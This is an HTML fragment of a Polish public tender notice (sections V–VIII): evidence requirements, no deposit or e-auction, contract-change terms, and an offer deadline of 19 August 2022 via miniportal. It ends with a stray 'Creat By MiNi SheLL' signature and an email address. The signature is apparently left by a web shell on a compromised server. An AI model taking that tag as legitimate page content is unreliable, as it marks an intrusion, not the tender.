Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia.<br/><br/>Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp nie jest podmiotowym środkiem dowodowym i stanowi dowód<br/>potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w postępowaniu na dzień składania ofert tymczasowo<br/>zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>Oświadczenie, o którym mowa w pkt 10.2. IDW Wykonawca zobowiązany jest złożyć, zgodnie ze wzorem, który stanowi Formularz<br/>3.1 na zasadach określonych w pkt. 14 IDW.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu.<br/><br/>Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp nie jest podmiotowym środkiem dowodowym i stanowi dowód<br/>potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w postępowaniu na dzień składania ofert tymczasowo<br/>zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>Oświadczenie, o którym mowa w pkt 10.2. IDW Wykonawca zobowiązany jest złożyć, zgodnie ze wzorem, który stanowi Formularz<br/>3.1 na zasadach określonych w pkt. 14 IDW.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przesłanki umożliwiające dokonanie zmian postanowień umowy zawartej z wybranym wykonawcą zawierają projektowane<br/>postanowienia umowy w § 14 Załącznika nr II.3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-19 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com